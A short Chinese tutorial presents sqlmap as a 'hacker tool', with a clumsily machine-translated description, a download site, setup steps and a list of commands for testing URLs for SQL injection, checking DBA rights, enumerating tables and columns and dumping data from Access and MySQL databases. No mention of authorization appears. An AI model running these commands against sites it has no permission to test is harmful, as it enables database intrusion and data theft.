.

一、sqlmap黑客工具:

其实，黑客工具是很多的，上一篇文章也提到了一些简单的黑客工具列表，今天来说说sqlmap黑客工具的使用！sqlmap是一个开源工具，可自动检测和利用SQL注入漏洞和接管数据库服务器的过程。它包括一个功能强大的检测引擎，许多利基特征为终端渗透测试者和广泛的交换机持续从数据库指纹，数据从数据库提取，访问底层文件系统，并通过操作系统执行命令带间连接。sqlmap是一个开源渗透测试工具，它具有强大的检测引擎，同时有众多功能，包括数据库指纹识别、完全支持MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Access，IBM DB2，SQLite，Firebird，Sybase，SAP MaxDB，HSQLDB和Informix数据库管理系统。完全支持6种SQL注入技术，这些技术是基于布尔的盲人，基于时间的盲人，基于错误的，基于UNION查询的，堆叠的查询和带外的。

二、sqlmap黑客工具官方网站（http://sqlmap.org）下载：

三、sqlmap工具使用方法:

1，需要在启动电脑上安装python环境

2，在安装目录下，启动cmd窗口，然后调用python运行

四、sqlmap工具具体怎么使用？

1、注入access数据库常用的参数

sqlmap.py -u "url"  //判断参数是否存在注入

sqlmap.py -u "url" --tables //猜解表名

sqlmap.py -u "url" --columns -T "要猜解的表名"  //猜解列名

sqlmap.py -u "url" --dump -C "列名" -T “表名”  //爆出字段数据

2、注入MySQL数据库常用参数

sqlmap.py -u "url"  //判断参数是否存在注入

sqlmap.py -u "url" --current-db  //查看网站当前数据库

sqlmap.py -u "url" --is-dba  //查看当前用户权限

sqlmap.py -u "url" --tables //猜解表名

sqlmap.py -u "url" --columns -T "要猜解的表名"  //猜解列名

sqlmap.py -u "url" --dump -C "列名" -T “表名”  //爆出字段数据